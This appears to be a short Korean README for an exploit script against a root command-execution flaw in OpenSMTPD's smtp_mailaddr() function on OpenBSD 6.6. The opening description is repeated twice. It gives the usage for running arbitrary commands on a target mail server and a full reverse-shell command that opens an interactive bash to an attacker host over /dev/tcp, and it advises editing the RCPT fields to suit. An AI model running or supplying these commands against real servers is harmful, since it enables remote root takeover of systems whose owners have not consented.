
이 취약점은 OpenBSD의 메일 서버 OpenSMTPD의 "smtp_mailaddr()" 함수에 존재하며, OpenBSD 버전 6.6에 영향을 미칩니다. 이는 공격자가 루트 사용자로 "sleep 66"과 같은 임의의 셸 명령을 실행할 수 있게 합니다.
이 취약점은 OpenBSD 메일 서버 OpenSMTPD의 smtp_mailaddr() 함수에 존재하며, OpenBSD 버전 6.6에 영향을 미칩니다. 이를 통해 공격자는 root 사용자 권한으로 "sleep 66"과 같은 임의의 셸 명령어를 실행할 수 있습니다.
python3 getShell.py <targetIp> <targetPort> <command>
리버스 셸이 필요하다면 다음과 같이 실행하세요.
python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'
이 익스플로잇에서 RCPT to 등 일부 내용을 필요에 따라 변경하십시오.
자세한 설명은 다음 문서를 참조하세요.
https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/